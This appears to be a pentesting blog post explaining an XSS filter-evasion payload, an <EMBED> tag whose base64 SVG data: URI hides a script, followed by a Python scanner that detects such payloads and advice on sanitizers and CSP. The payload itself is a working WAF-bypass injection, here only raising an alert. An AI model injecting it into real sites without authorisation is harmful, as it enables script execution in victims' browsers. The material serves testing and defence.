Week 1 - XSS Filter Evasion
Advanced XSS using <embed>
To start off the new year, I’ll be kicking off a series of posts containing Web App Hacking Tips & Tricks. This week’s tip is related to Advanced Cross-Site Scripting:
Several times in the past, I’ve found myself testing a website that allows HTML Injection, but I can’t seem to get a working XSS payload or pop an alert box. Typically, the application has some kind of WAF running that blocks specific HTML tags (script, img, a) or, more commonly, HTML event handler attributes (onclick, onerror, onpageshow). In these situations, I’ve found that the payload below executes successfully:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
The above base64 decodes to:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert("XSS");</script></svg>
Because this payload contains no HTML event handler attributes and uses the less common <embed> tag, it is a useful addition to your pentesting notes. The script lives inside the base64-encoded SVG document that the browser loads from the data: URI, so a filter that only inspects the tag names and attributes of the injected HTML never sees it.
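The flip side of the same observation is how a defender catches this: decode the data: URI and inspect the nested document, rather than only the outer tag. The following scanner is an added example and not code from the original post. It decodes base64 and percent-encoded data: URIs found in the src/data attributes of embed, object and iframe elements, and reports any whose decoded body carries script or event handlers; the sample HTML snippets, SVG documents and the tag/attribute lists it uses are constructed for this example.

```python
"""Defensive scanner for the <embed> data: URI trick (added example).

It decodes data: URIs in the src/data attributes of embedding elements and
flags ones whose decoded document contains active content, which is where
the post's payload hides its <script>.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

# Elements that render a URL as a nested document (assumed list; <embed> is the
# one the post uses, <object>/<iframe> accept data: URIs the same way).
EMBEDDING_TAGS = {"embed", "object", "iframe"}
URL_ATTRS = {"src", "data"}

DATA_URI_RE = re.compile(
    r"^\s*data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<body>.*)\Z", re.I | re.S
)
# Markers of script execution inside the decoded document.
ACTIVE_CONTENT_RE = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.I)


def decode_data_uri(value: str):
    """Return (mime, decoded_text) for a data: URI, or None if value is not one."""
    m = DATA_URI_RE.match(value)
    if not m:
        return None
    mime = m.group("mime").lower() or "text/plain"
    body = m.group("body")
    if ";base64" in m.group("params").lower():
        # Browsers ignore whitespace in the base64 body and tolerate missing
        # padding, so normalise the same way before decoding.
        compact = re.sub(r"\s+", "", body).rstrip("=")
        compact += "=" * (-len(compact) % 4)
        raw = base64.b64decode(compact)
    else:
        raw = unquote_to_bytes(body)
    return mime, raw.decode("utf-8", errors="replace")


class EmbeddedScriptScanner(HTMLParser):
    """Collects (tag, mime, snippet) for embedded data: documents carrying script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in EMBEDDING_TAGS:        # HTMLParser lowercases tag names
            return
        for name, value in attrs:           # ...and attribute names
            if name in URL_ATTRS and value:
                decoded = decode_data_uri(value)
                if decoded and ACTIVE_CONTENT_RE.search(decoded[1]):
                    self.findings.append((tag, decoded[0], decoded[1][:80]))


def scan_html(html: str):
    """Return a list of findings for every embedded data: document with script."""
    scanner = EmbeddedScriptScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# --- constructed samples (not taken from the post) ----------------------------
def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


MALICIOUS_SVG = ('<svg xmlns="http://www.w3.org/2000/svg"><script type="text/ecmascript">'
                 'alert("XSS");</script></svg>')
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

# Same shape as the post's payload: upper-case tag, no event attributes.
SAMPLE_MALICIOUS = ('<EMBED SRC="data:image/svg+xml;base64,' + _b64(MALICIOUS_SVG)
                    + '" type="image/svg+xml"></EMBED>')
SAMPLE_BENIGN = '<embed src="data:image/svg+xml;base64,' + _b64(BENIGN_SVG) + '">'
# Percent-encoded variant via <object data=...>, to show the non-base64 path.
SAMPLE_PERCENT = ('<object data="data:image/svg+xml,'
                  '%3Csvg%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/svg%3E"></object>')

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN, SAMPLE_PERCENT):
        print(scan_html(sample) or "clean")
```

Run over a request body or a stored page, the scanner reports the embed and object samples and stays silent on the benign SVG. It is a detection aid, not the fix: the durable mitigation is to refuse data: URIs in user-supplied src/data attributes at the sanitizer and to serve a Content-Security-Policy with object-src 'none', which stops embed and object from loading any plugin or nested document regardless of how the payload is encoded.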